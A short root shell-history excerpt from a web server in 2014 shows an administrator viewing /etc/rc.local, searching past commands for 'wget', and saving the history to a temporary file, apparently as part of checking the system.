1008 2014-01-20 22:33:55 root cat /etc/rc.local
1009 2014-01-20 22:38:33 root history|grep wget
1010 2014-01-20 23:11:31 root history|more
1011 2014-01-20 23:14:47 root history > /tmp/tttt
[root@web tmp]#